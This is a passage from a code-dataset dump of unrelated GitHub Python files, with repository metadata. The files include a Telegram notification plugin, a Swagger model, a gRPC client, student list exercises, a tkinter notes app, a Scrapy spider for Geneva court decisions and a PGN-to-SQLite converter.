(r'(bot)?[0-9]+:[a-z0-9_-]+', 'i'),\n },\n 'target_user': {\n 'name': _('Target Chat ID'),\n 'type': 'string',\n 'map_to': 'targets',\n 'map_to': 'targets',\n 'regex': (r'((-?[0-9]{1,32})|([a-z_-][a-z0-9_-]+))', 'i'),\n },\n 'targets': {\n 'name': _('Targets'),\n 'type': 'list:string',\n },\n })\n\n # Define our template arguments\n template_args = dict(NotifyBase.template_args, **{\n 'image': {\n 'name': _('Include Image'),\n 'type': 'bool',\n 'default': False,\n 'map_to': 'include_image',\n },\n 'detect': {\n 'name': _('Detect Bot Owner'),\n 'type': 'bool',\n 'default': True,\n 'map_to': 'detect_owner',\n },\n 'to': {\n 'alias_of': 'targets',\n },\n })\n\n def __init__(self, bot_token, targets, detect_owner=True,\n include_image=False, **kwargs):\n \"\"\"\n Initialize Telegram Object\n \"\"\"\n super(NotifyTelegram, self).__init__(**kwargs)\n\n try:\n self.bot_token = bot_token.strip()\n\n except AttributeError:\n # Token was None\n err = 'No Bot Token was specified.'\n self.logger.warning(err)\n raise TypeError(err)\n\n result = VALIDATE_BOT_TOKEN.match(self.bot_token)\n if not result:\n err = 'The Bot Token specified (%s) is invalid.' % bot_token\n self.logger.warning(err)\n raise TypeError(err)\n\n # Store our Bot Token\n self.bot_token = result.group('key')\n\n # Parse our list\n self.targets = parse_list(targets)\n\n self.detect_owner = detect_owner\n\n if self.user:\n # Treat this as a channel too\n self.targets.append(self.user)\n\n if len(self.targets) == 0 and self.detect_owner:\n _id = self.detect_bot_owner()\n if _id:\n # Store our id\n self.targets.append(str(_id))\n\n if len(self.targets) == 0:\n err = 'No chat_id(s) were specified.'\n self.logger.warning(err)\n raise TypeError(err)\n\n # Track whether or not we want to send an image with our notification\n # or not.\n self.include_image = include_image\n\n def send_image(self, chat_id, notify_type):\n \"\"\"\n Sends a sticker based on the specified notify type\n\n \"\"\"\n\n # The URL; we do not set headers because the api doesn't seem to like\n # when we set one.\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'sendPhoto'\n )\n\n # Acquire our image path if configured to do so; we don't bother\n # checking to see if selfinclude_image is set here because the\n # send_image() function itself (this function) checks this flag\n # already\n path = self.image_path(notify_type)\n\n if not path:\n # No image to send\n self.logger.debug(\n 'Telegram image does not exist for %s' % (notify_type))\n\n # No need to fail; we may have been configured this way through\n # the apprise.AssetObject()\n return True\n\n try:\n with open(path, 'rb') as f:\n # Configure file payload (for upload)\n files = {\n 'photo': f,\n }\n\n payload = {\n 'chat_id': chat_id,\n }\n\n self.logger.debug(\n 'Telegram image POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate))\n\n try:\n r = requests.post(\n url,\n files=files,\n data=payload,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = NotifyTelegram\\\n .http_response_code_lookup(r.status_code)\n\n self.logger.warning(\n 'Failed to send Telegram image: '\n '{}{}error={}.'.format(\n status_str,\n ', ' if status_str else '',\n r.status_code))\n\n self.logger.debug(\n 'Response Details:\\r\\n{}'.format(r.content))\n\n return False\n\n except requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured posting Telegram image.')\n self.logger.debug('Socket Exception: %s' % str(e))\n return False\n\n return True\n\n except (IOError, OSError):\n # IOError is present for backwards compatibility with Python\n # versions older then 3.3. >= 3.3 throw OSError now.\n\n # Could not open and/or read the file; this is not a problem since\n # we scan a lot of default paths.\n self.logger.error(\n 'File can not be opened for read: {}'.format(path))\n\n return False\n\n def detect_bot_owner(self):\n \"\"\"\n Takes a bot and attempts to detect it's chat id from that\n\n \"\"\"\n\n headers = {\n 'User-Agent': self.app_id,\n 'Content-Type': 'application/json',\n }\n\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'getUpdates'\n )\n\n self.logger.debug(\n 'Telegram User Detection POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate))\n\n try:\n r = requests.post(\n url,\n headers=headers,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = \\\n NotifyTelegram.http_response_code_lookup(r.status_code)\n\n try:\n # Try to get the error message if we can:\n error_msg = loads(r.content)['description']\n\n except Exception:\n error_msg = None\n\n if error_msg:\n self.logger.warning(\n 'Failed to detect the Telegram user: (%s) %s.' % (\n r.status_code, error_msg))\n\n else:\n self.logger.warning(\n 'Failed to detect the Telegram user: '\n '{}{}error={}.'.format(\n status_str,\n ', ' if status_str else '',\n r.status_code))\n\n self.logger.debug('Response Details:\\r\\n{}'.format(r.content))\n\n return 0\n\n except requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured detecting the Telegram User.')\n self.logger.debug('Socket Exception: %s' % str(e))\n return 0\n\n # A Response might look something like this:\n # {\n # \"ok\":true,\n # \"result\":[{\n # \"update_id\":645421321,\n # \"message\":{\n # \"message_id\":1,\n # \"from\":{\n # \"id\":532389719,\n # \"is_bot\":false,\n # \"first_name\":\"Chris\",\n # \"language_code\":\"en-US\"\n # },\n # \"chat\":{\n # \"id\":532389719,\n # \"first_name\":\"Chris\",\n # \"type\":\"private\"\n # },\n # \"date\":1519694394,\n # \"text\":\"/start\",\n # \"entities\":[{\"offset\":0,\"length\":6,\"type\":\"bot_command\"}]}}]\n\n # Load our response and attempt to fetch our userid\n response = loads(r.content)\n if 'ok' in response and response['ok'] is True:\n start = re.compile(r'^\\s*\\/start', re.I)\n for _msg in iter(response['result']):\n # Find /start\n if not start.search(_msg['message']['text']):\n continue\n\n _id = _msg['message']['from'].get('id', 0)\n _user = _msg['message']['from'].get('first_name')\n self.logger.info('Detected telegram user %s (userid=%d)' % (\n _user, _id))\n # Return our detected userid\n return _id\n\n self.logger.warning(\n 'Could not detect bot owner. Is it running (/start)?')\n\n return 0\n\n def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):\n \"\"\"\n Perform Telegram Notification\n \"\"\"\n\n headers = {\n 'User-Agent': self.app_id,\n 'Content-Type': 'application/json',\n }\n\n # error tracking (used for function return)\n has_error = False\n\n url = '%s%s/%s' % (\n self.notify_url,\n self.bot_token,\n 'sendMessage'\n )\n\n payload = {}\n\n # Prepare Email Message\n if self.notify_format == NotifyFormat.MARKDOWN:\n payload['parse_mode'] = 'MARKDOWN'\n\n else:\n # Either TEXT or HTML; if TEXT we'll make it HTML\n payload['parse_mode'] = 'HTML'\n\n # HTML Spaces ( ) and tabs ( ) aren't supported\n # See https://core.telegram.org/bots/api#html-style\n body = re.sub(' ?', ' ', body, re.I)\n\n # Tabs become 3 spaces\n body = re.sub(' ?', ' ', body, re.I)\n\n if title:\n # HTML Spaces ( ) and tabs ( ) aren't supported\n # See https://core.telegram.org/bots/api#html-style\n title = re.sub(' ?', ' ', title, re.I)\n\n # Tabs become 3 spaces\n title = re.sub(' ?', ' ', title, re.I)\n\n # HTML\n title = NotifyTelegram.escape_html(title, whitespace=False)\n\n # HTML\n body = NotifyTelegram.escape_html(body, whitespace=False)\n\n if title and self.notify_format == NotifyFormat.TEXT:\n # Text HTML Formatting\n payload['text'] = '%s\\r\\n%s' % (\n title,\n body,\n )\n\n elif title:\n # Already HTML; trust developer has wrapped\n # the title appropriately\n payload['text'] = '%s\\r\\n%s' % (\n title,\n body,\n )\n\n else:\n # Assign the body\n payload['text'] = body\n\n # Create a copy of the chat_ids list\n targets = list(self.targets)\n while len(targets):\n chat_id = targets.pop(0)\n chat_id = IS_CHAT_ID_RE.match(chat_id)\n if not chat_id:\n self.logger.warning(\n \"The specified chat_id '%s' is invalid; skipping.\" % (\n chat_id,\n )\n )\n\n # Flag our error\n has_error = True\n continue\n\n if chat_id.group('name') is not None:\n # Name\n payload['chat_id'] = '@%s' % chat_id.group('name')\n\n else:\n # ID\n payload['chat_id'] = int(chat_id.group('idno'))\n\n # Always call throttle before any remote server i/o is made;\n # Telegram throttles to occur before sending the image so that\n # content can arrive together.\n self.throttle()\n\n if self.include_image is True:\n # Send an image\n self.send_image(payload['chat_id'], notify_type)\n\n self.logger.debug('Telegram POST URL: %s (cert_verify=%r)' % (\n url, self.verify_certificate,\n ))\n self.logger.debug('Telegram Payload: %s' % str(payload))\n\n try:\n r = requests.post(\n url,\n data=dumps(payload),\n headers=headers,\n verify=self.verify_certificate,\n )\n\n if r.status_code != requests.codes.ok:\n # We had a problem\n status_str = \\\n NotifyTelegram.http_response_code_lookup(r.status_code)\n\n try:\n # Try to get the error message if we can:\n error_msg = loads(r.content)['description']\n\n except Exception:\n error_msg = None\n\n self.logger.warning(\n 'Failed to send Telegram notification to {}: '\n '{}, error={}.'.format(\n payload['chat_id'],\n error_msg if error_msg else status_str,\n r.status_code))\n\n self.logger.debug(\n 'Response Details:\\r\\n{}'.format(r.content))\n\n # Flag our error\n has_error = True\n continue\n\n else:\n self.logger.info('Sent Telegram notification.')\n\n except requests.RequestException as e:\n self.logger.warning(\n 'A connection error occured sending Telegram:%s ' % (\n payload['chat_id']) + 'notification.'\n )\n self.logger.debug('Socket Exception: %s' % str(e))\n\n # Flag our error\n has_error = True\n continue\n\n return not has_error\n\n def url(self):\n \"\"\"\n Returns the URL built dynamically based on specified arguments.\n \"\"\"\n\n # Define any arguments set\n args = {\n 'format': self.notify_format,\n 'overflow': self.overflow_mode,\n 'image': self.include_image,\n 'verify': 'yes' if self.verify_certificate else 'no',\n 'detect': 'yes' if self.detect_owner else 'no',\n }\n\n # No need to check the user token because the user automatically gets\n # appended into the list of chat ids\n return '{schema}://{bot_token}/{targets}/?{args}'.format(\n schema=self.secure_protocol,\n bot_token=NotifyTelegram.quote(self.bot_token, safe=''),\n targets='/'.join(\n [NotifyTelegram.quote('@{}'.format(x)) for x in self.targets]),\n args=NotifyTelegram.urlencode(args))\n\n @staticmethod\n def parse_url(url):\n \"\"\"\n Parses the URL and returns enough arguments that can allow\n us to substantiate this object.\n\n \"\"\"\n # This is a dirty hack; but it's the only work around to tgram://\n # messages since the bot_token has a colon in it. It invalidates a\n # normal URL.\n\n # This hack searches for this bogus URL and corrects it so we can\n # properly load it further down. The other alternative is to ask users\n # to actually change the colon into a slash (which will work too), but\n # it's more likely to cause confusion... So this is the next best thing\n # we also check for %3A (incase the URL is encoded) as %3A == :\n try:\n tgram = re.match(\n r'(?P{schema}://)(bot)?(?P([a-z0-9_-]+)'\n r'(:[a-z0-9_-]+)?@)?(?P[0-9]+)(:|%3A)+'\n r'(?P.*)$'.format(\n schema=NotifyTelegram.secure_protocol), url, re.I)\n\n except (TypeError, AttributeError):\n # url is bad; force tgram to be None\n tgram = None\n\n if not tgram:\n # Content is simply not parseable\n return None\n\n if tgram.group('prefix'):\n # Try again\n results = NotifyBase.parse_url('%s%s%s/%s' % (\n tgram.group('protocol'),\n tgram.group('prefix'),\n tgram.group('btoken_a'),\n tgram.group('remaining')))\n\n else:\n # Try again\n results = NotifyBase.parse_url(\n '%s%s/%s' % (\n tgram.group('protocol'),\n tgram.group('btoken_a'),\n tgram.group('remaining'),\n ),\n )\n\n # The first token is stored in the hostname\n bot_token_a = NotifyTelegram.unquote(results['host'])\n\n # Get a nice unquoted list of path entries\n entries = NotifyTelegram.split_path(results['fullpath'])\n\n # Now fetch the remaining tokens\n bot_token_b = entries.pop(0)\n\n bot_token = '%s:%s' % (bot_token_a, bot_token_b)\n\n # Store our chat ids (as these are the remaining entries)\n results['targets'] = entries\n\n # Support the 'to' variable so that we can support rooms this way too\n # The 'to' makes it easier to use yaml configuration\n if 'to' in results['qsd'] and len(results['qsd']['to']):\n results['targets'] += \\\n NotifyTelegram.parse_list(results['qsd']['to'])\n\n # Store our bot token\n results['bot_token'] = bot_token\n\n # Include images with our message\n results['include_image'] = \\\n parse_bool(results['qsd'].get('image', False))\n\n # Include images with our message\n results['detect_owner'] = \\\n parse_bool(results['qsd'].get('detect', True))\n\n return results\n","repo_name":"webflo-dev/bazarr","sub_path":"bazarr/libs/apprise/plugins/NotifyTelegram.py","file_name":"NotifyTelegram.py","file_ext":"py","file_size_in_byte":19772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"72573701692","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom clashofcubicles.models.message import Message\nfrom clashofcubicles.models.task import Task\nfrom clashofcubicles.models.worker import Worker\nfrom .base_model_ import Model\nfrom datetime import date, datetime\nfrom typing import List, Dict\nfrom ..util import deserialize_model\n\n\nclass Message(Model):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, id=None, recipients=None, sender=None, text=None, attachments=None):\n \"\"\"\n Message - a model defined in Swagger\n\n :param id: The id of this Message.\n :type id: int\n :param recipients: The recipients of this Message.\n :type recipients: List[Worker]\n :param sender: The sender of this Message.\n :type sender: Message\n :param text: The text of this Message.\n :type text: str\n :param attachments: The attachments of this Message.\n :type attachments: List[Task]\n \"\"\"\n self.swagger_types = {\n 'id': int,\n 'recipients': List[Worker],\n 'sender': Message,\n 'text': str,\n 'attachments': List[Task]\n }\n\n self.attribute_map = {\n 'id': 'id',\n 'recipients': 'recipients',\n 'sender': 'sender',\n 'text': 'text',\n 'attachments': 'attachments'\n }\n\n self._id = id\n self._recipients = recipients\n self._sender = sender\n self._text = text\n self._attachments = attachments\n\n @classmethod\n def from_dict(cls, dikt):\n \"\"\"\n Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Message of this Message.\n :rtype: Message\n \"\"\"\n return deserialize_model(dikt, cls)\n\n @property\n def id(self):\n \"\"\"\n Gets the id of this Message.\n\n :return: The id of this Message.\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"\n Sets the id of this Message.\n\n :param id: The id of this Message.\n :type id: int\n \"\"\"\n if id is None:\n raise ValueError(\"Invalid value for `id`, must not be `None`\")\n\n self._id = id\n\n @property\n def recipients(self):\n \"\"\"\n Gets the recipients of this Message.\n\n :return: The recipients of this Message.\n :rtype: List[Worker]\n \"\"\"\n return self._recipients\n\n @recipients.setter\n def recipients(self, recipients):\n \"\"\"\n Sets the recipients of this Message.\n\n :param recipients: The recipients of this Message.\n :type recipients: List[Worker]\n \"\"\"\n if recipients is None:\n raise ValueError(\"Invalid value for `recipients`, must not be `None`\")\n\n self._recipients = recipients\n\n @property\n def sender(self):\n \"\"\"\n Gets the sender of this Message.\n\n :return: The sender of this Message.\n :rtype: Message\n \"\"\"\n return self._sender\n\n @sender.setter\n def sender(self, sender):\n \"\"\"\n Sets the sender of this Message.\n\n :param sender: The sender of this Message.\n :type sender: Message\n \"\"\"\n\n self._sender = sender\n\n @property\n def text(self):\n \"\"\"\n Gets the text of this Message.\n\n :return: The text of this Message.\n :rtype: str\n \"\"\"\n return self._text\n\n @text.setter\n def text(self, text):\n \"\"\"\n Sets the text of this Message.\n\n :param text: The text of this Message.\n :type text: str\n \"\"\"\n if text is None:\n raise ValueError(\"Invalid value for `text`, must not be `None`\")\n\n self._text = text\n\n @property\n def attachments(self):\n \"\"\"\n Gets the attachments of this Message.\n\n :return: The attachments of this Message.\n :rtype: List[Task]\n \"\"\"\n return self._attachments\n\n @attachments.setter\n def attachments(self, attachments):\n \"\"\"\n Sets the attachments of this Message.\n\n :param attachments: The attachments of this Message.\n :type attachments: List[Task]\n \"\"\"\n\n self._attachments = attachments\n\n","repo_name":"grubino/clashofcubicles-api","sub_path":"clashofcubicles/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16829844474","text":"# coding=utf-8\nfrom __future__ import print_function\n\nimport time\n\nimport google\nimport grpc\n\nfrom proto import product_pb2\nfrom proto import product_pb2_grpc\n\nfrom proto import book_pb2\nfrom proto import book_pb2_grpc\n\n\ndef run_product():\n channel = grpc.insecure_channel('127.0.0.1:50051')\n stub = product_pb2_grpc.ProductInfoStub(channel)\n\n response = stub.addProduct(\n product_pb2.Product(id=str(time.time()), name='Hello World! This is message from client!'))\n print(\"addProduct received: %s\" % response.value)\n\n response = stub.getProduct(\n product_pb2.ProductId(value=str(time.time())))\n print(\"getProduct received: %s\" % response.name)\n\n\ndef run_book():\n channel = grpc.insecure_channel('127.0.0.1:50051')\n stub = book_pb2_grpc.BookServiceStub(channel)\n\n # addBook\n response = stub.addBook(\n book_pb2.Book(id=str(time.time()), name='Hello World! This is message from client!'))\n print(\"addBook received: %s, %s\" % (type(response), response))\n\n # getBook\n response = stub.getBook(google.protobuf.wrappers_pb2.StringValue(value=\"2\"))\n print(\"getBook received: %s, %s\" % (type(response), response))\n\n # searchBooks\n response = stub.searchBooks(google.protobuf.wrappers_pb2.StringValue(value=\"明清小说\"))\n for x in response:\n print(\"searchBooks received: %s, %s\" % (type(x), x))\n\n # updateBooks\n def generate_book_messages():\n for x in range(10):\n yield book_pb2.Book(id=str(time.time()), name='Hello World! This is message from client!')\n\n response = stub.updateBooks(generate_book_messages())\n print(\"updateBooks received: %s, %s\" % (type(response), response))\n\n # processBooks\n def generate_string_messages():\n for x in range(10):\n yield google.protobuf.wrappers_pb2.StringValue(value=str(time.time()) + ' Hello World! This is message from client!')\n response = stub.processBooks(generate_string_messages())\n for x in response:\n print(\"processBooks received: %s, %s\" % (type(x), x))\n\n\nif __name__ == '__main__':\n run_book()\n","repo_name":"tyronecai/grpc_demo","sub_path":"python/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42266812593","text":"#!/usr/bin/env python3\n\"\"\"Alta3 Research | MayuriDalavai\n List, Input, Print, Concatenate, Variables\"\"\"\nimport random\n\ndef main():\n\n # create a wordbank list \n wordbank = [\"indentation\", \"spaces\"]\n\n # create a students list\n tlgstudents = [\"Aaron\", \"Andy\", \"Asif\", \"Brent\", \"Cedric\", \"Chris\", \"Cory\", \"Ebrima\",\n \"Franco\", \"Greg\", \"Hoon\", \"Joey\", \"Jordan\", \"JC\", \"LB\", \"Mabel\", \"Shon\", \"Pat\", \"Zach\"]\n\n # append 4 to the list wordbank\n wordbank.append(4)\n print(wordbank)\n\n num =int(input(\"choose a number between 0 and 18: \"))\n name = tlgstudents[num]\n\n print(f\"Your Choice of tlgstudents is {name}!\")\n print(f\"{name} always uses {wordbank[2]} {wordbank[1]} to indent.\")\n\n name = random.choice(tlgstudents)\n print(f\"{name}\")\n\n\nmain() \n","repo_name":"Mayuridalavai/mycode","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7751707734","text":"import numpy as np\nimport scipy.sparse, scipy.linalg, scipy.spatial\nimport sklearn.metrics\n\ndef grid(m, dtype=np.float32):\n \"\"\"Return the embedding of a grid graph.\"\"\"\n M = m**2\n x = np.linspace(0, 1, m, dtype=dtype)\n y = np.linspace(0, 1, m, dtype=dtype)\n xx, yy = np.meshgrid(x, y)\n z = np.empty((M, 2), dtype)\n z[:, 0] = xx.reshape(M)\n z[:, 1] = yy.reshape(M)\n return z\n\ndef distance_sklearn_metrics(z, k=4, metric='euclidean'):\n \"\"\"Compute exact pairwise distances.\"\"\"\n d = sklearn.metrics.pairwise.pairwise_distances(\n z, metric=metric, n_jobs=-2)\n # k-NN graph.\n idx = np.argsort(d)[:, 1:k+1]\n d.sort()\n d = d[:, 1:k+1]\n return d, idx\n\ndef adjacency(dist, idx):\n \"\"\"Return the adjacency matrix of a kNN graph.\"\"\"\n M, k = dist.shape\n assert M, k == idx.shape\n assert dist.min() >= 0\n\n # Weights.\n sigma2 = np.mean(dist[:, -1])**2\n dist = np.exp(- dist**2 / sigma2)\n\n # Weight matrix.\n I = np.arange(0, M).repeat(k)\n J = idx.reshape(M*k)\n V = dist.reshape(M*k)\n W = scipy.sparse.coo_matrix((V, (I, J)), shape=(M, M))\n\n # No self-connections.\n W.setdiag(0)\n\n # Non-directed graph.\n bigger = W.T > W\n W = W - W.multiply(bigger) + W.T.multiply(bigger)\n\n assert W.nnz % 2 == 0\n assert np.abs(W - W.T).mean() < 1e-10\n assert type(W) is scipy.sparse.csr.csr_matrix\n return W\n\ndef laplacian(W, normalized=True):\n \"\"\"Return the Laplacian of the weigth matrix.\"\"\"\n\n # Degree matrix.\n d = W.sum(axis=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n d += np.spacing(np.array(0, W.dtype))\n d = 1 / np.sqrt(d)\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L\n\na = grid(3)\ndist, idx = distance_sklearn_metrics(a, k=4, metric='euclidean')\nA = adjacency(dist, idx)\nL = laplacian(A, normalized=True)","repo_name":"GitLanx/MultiModalSeg","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3933903711","text":"import tkinter as tk\r\nfrom tkinter import filedialog\r\n\r\n\r\nclass NotesApp(tk.Tk):\r\n def __init__(self):\r\n super().__init__()\r\n self.title(\"Notes App\")\r\n self.geometry(\"400x300\")\r\n\r\n self.text_area = tk.Text(self, wrap=\"word\")\r\n self.text_area.pack(expand=True, fill=\"both\")\r\n\r\n self.menu_bar = tk.Menu(self)\r\n self.file_menu = tk.Menu(self.menu_bar, tearoff=0)\r\n self.file_menu.add_command(label=\"New\", command=self.open_note)\r\n self.file_menu.add_command(label=\"Open\", command=self.open_note)\r\n self.file_menu.add_command(label=\"Save\", command=self.save_note)\r\n self.file_menu.add_command(label=\"Exit\", command=self.quit)\r\n self.menu_bar.add_cascade(label=\"File\", menu=self.file_menu)\r\n self.config(menu=self.menu_bar)\r\n\r\n self.current_file = None\r\n\r\n def new_note(self):\r\n self.text_area.delete(1.0, tk.END)\r\n self.current_file = None\r\n\r\n def open_note(self):\r\n file_path = filedialog.askopenfilename(filetypes=[(\"Text Files\", \"*.txt\")])\r\n if file_path:\r\n with open(file_path, \"r\") as file:\r\n self.text_area.delete(1.0, tk.END)\r\n self.text_area.insert(tk.END, file.read())\r\n self.current_file = file_path\r\n\r\n def save_note(self):\r\n if self.current_file:\r\n with open(self.current_file, \"w\") as file:\r\n file.write(self.text_area.get(1.0, tk.END))\r\n else:\r\n file_path = filedialog.asksaveasfilename(\r\n defaultextension=\".txt\", filetypes=[(\"Text Files\", \"*.txt\")]\r\n )\r\n if file_path:\r\n with open(file_path, \"w\") as file:\r\n file.write(self.text_area.get(1.0, tk.END))\r\n self.current_file = file_path\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app = NotesApp()\r\n app.mainloop()\r\n","repo_name":"ExpertCoder101/GUI-Apps","sub_path":"GUI App 5.py","file_name":"GUI App 5.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20452365190","text":"#Kreye yon lis eleman ki divizib pa 2, nan entèval [0-n] enklizif\nn = int (input (\"Rantre pi gwo nonb ou vle nan lis ou a : \\n\"))\nlist1 = []\nfor i in range(n + 1) :\n if i%2 == 0:\n list1.append(i)\nprint(f\"Premye lis nou an ki fet ak nonb ki divizib pa 2 : {list1} \\n\")\n\n#Ou gen yon lis antye, konvèti l an yon lis chenn\nchenn1= ''.join(map(str,list1))\nprint(f\"Lis chenn lan se :{chenn1} \\n\")\n\n#Ou gen yon lis chenn ki an miniskil, konvèti an yon lis chenn majiskil\nMajiskil = chenn1.upper()\nprint(f\"Lis la an majiskil se : {Majiskil} \\n\")\n\n#Ou gen yon lis, kreye yon nouvo lis ki fèt ak eleman ki nan endèks ki divizib pa 3 yo sèlman\nlist2=[]\nfor i in range(len(list1)):\n if i % 3 ==0:\n list2.append(list1[i])\nprint ( f\"Nonb ki nan endeks divizib pa 3 yo se :{list2} \\n\" )\n\n#Ou gen lis eleman, kreye yon nouvo lis ki gen chak 3 eleman yo gwoupe anndan yon tipl.\nlist3 = []\nfor i in range(0, len(list1),3):\n gwoup= tuple (list1[i:i+3])\n list3.append(gwoup)\nprint(f\"Eleman yo regwoupe pa 3 nan list sa a : {list3} \\n\")\n\n#Ou gen yon lis, ki gen yon pakèt eleman ki repete. Konvèti l an yon lis, ki pa gen okenn doublon\nlistSanDoublon= list(set(list1 + list3))\nprint(f\"List ki San Doublon an se :{listSanDoublon} \\n\")\n\n#Ou gen 2 lis. Kreye yon nouvo lis, ki genyen sèlman eleman komen ant 2 lis yo\nlistSanDoublon1 = list(set(list1 + list2))\nprint(f\"Eleman komen yo se : {listSanDoublon1} \\n\")\n\n#Ou gen 2 lis. Kreye yon nouvo lis, ki genyen sèlman eleman distenge ant 2 lis yo\nlist4= list1 + listSanDoublon1\nListDistenge = []\nfor element in list1:\n if element not in listSanDoublon1 :\n ListDistenge.append(element)\nfor element in listSanDoublon1:\n if element not in list1 :\n ListDistenge.append(element)\nprint(f\"Nou te melanje List1 ak list san doublon. \\ n Eleman nan premye lis la se {list1}, eleman nan list san doublon an se{listSanDoublon1} \\n Lis distenge a se : {ListDistenge} \\n\")\n\n#Ou gen yon diksyonè. Kreye yon nouvo lis ak kle yo sèlman, epi yon lòt ak valè yo sèlman\ndiksyone = { 'nom': 'Simy', 'prenom' :'Lynne', 'lekol': 'ESIH'}\nlisKle = list(diksyone.keys())\nlisVale = list(diksyone.values())\nprint(f\"Nan diksyone sa, kle yo se {lisKle} epi vale yo se {lisVale} \\n \")\n\n#Reyini 3 lis ansanm, san okenn doublon\nDenyelist= list(set(list1 + list2+ listSanDoublon1))\nprint(f\"Denye lis la reyini 3 li ansanm. Vale yo se {Denyelist} \\n\")\n\n","repo_name":"Lynne30/Devoir-L4","sub_path":"LIST.py","file_name":"LIST.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"ht","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10293096055","text":"'''\r\nCreated on 2020. 8. 18.\r\n\r\n@author: GDJ24\r\n'''\r\nimport openpyxl # pip install openpyxl\r\nfilename = \"sales_2015.xlsx\"\r\nbook = openpyxl.load_workbook(filename)\r\nfor sheet in book.worksheets :\r\n data = []\r\n \r\n for row in sheet.rows :\r\n line = []\r\n for i, c in enumerate(row) :\r\n line.append(c.value)\r\n print(line)\r\n data.append(line)","repo_name":"jkh2801/python","sub_path":"pythonEx1/excel2.py","file_name":"excel2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26642951095","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass GeCcsSpider(scrapy.Spider):\n name = 'ge_ccs'\n allowed_domains = ['justice.geneve.ch']\n start_urls = ['http://justice.geneve.ch/tdb/Decis/CJ/ACJC/acjc.tdb?SFT=&S=*']\n\n def parse(self, response):\n alles = response.xpath('//div/div/b/a')\n for sel in alles:\n link = sel.xpath('.//@href').extract_first()\n link = response.urljoin(link)\n yield scrapy.Request(url=link, callback=self.weiter)\n\n next_page = response.xpath('//a[contains(text(), \"Suivant\")]/@href').extract_first()\n next_page = response.urljoin(next_page)\n# print next_page\n if next_page is not None:\n yield scrapy.Request(next_page, callback=self.parse)\n\n def weiter(self, response):\n url = response.xpath('//tr/td/div/a/@href').extract_first().encode('utf-8')\n url = response.urljoin(url)\n ref = url.rsplit('/', 1)[-1]\n# print url\n# print ref\n\n item = decision()\n item['referenz'] = ref\n item['file_urls'] = [url]\n yield item\n\nclass decision(scrapy.Item):\n url = scrapy.Field()\n file_urls = scrapy.Field()\n files = scrapy.Field()\n referenz = scrapy.Field()\n\n\n\n","repo_name":"Velofisch/entscheidsuche","sub_path":"Crawler/ge_cc/ge_cc/spiders/ge_ccs.py","file_name":"ge_ccs.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"14630785555","text":"#!/usr/bin/python3\n## Convert a large PGN to sqlite database (selected headers), batched commit for\n## speed up.\n\nimport chess\nimport chess.pgn\nimport sqlite3\nimport sys\nimport mmap\nimport re\nimport time\nimport os\n\n# Config\nfn = \"lichess.pgn\"\nfilesize = os.path.getsize(fn)\ndbn = fn + \".sqlite\"\ncommit = 10000\n\ncols = {\n 'num': 'int',\n 'offset': 'int',\n 'wname': 'text',\n 'bname': 'text',\n 'welo': 'int',\n 'belo': 'int',\n 'result': 'text',\n 'tc': 'text',\n 'plies': 'int',\n 'eco': 'text',\n 'ref': 'text'\n}\ninsertmarks = \"?, \" * (len(cols) - 1) + \"?\"\n\n# Open PGN\nf = open(fn, \"r\")\nmm = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)\nmm.madvise(mmap.MADV_SEQUENTIAL)\ngames = f\n\n# Set up DB\ndbconn = sqlite3.connect(dbn)\ndb = dbconn.cursor()\n\ndb.execute(\"DROP TABLE IF EXISTS pgn\")\ndb.execute(\"CREATE TABLE pgn (\" + \", \".join([ f\"{x[0]} {x[1]}\" for x in cols.items()]) + \")\")\n#sys.exit()\n\n# Main loop\nmcache = []\nmcached = 0\nccount = commit\nindex = 1\nts = time.time()\nwhile True:\n headeroff = games.tell()\n game = chess.pgn.read_game(games)\n if not game:\n break\n plies = game.end().ply()\n #ref = re.search(r\"lichess.org/(.*)$\", game.headers[\"Site\"])[1]\n 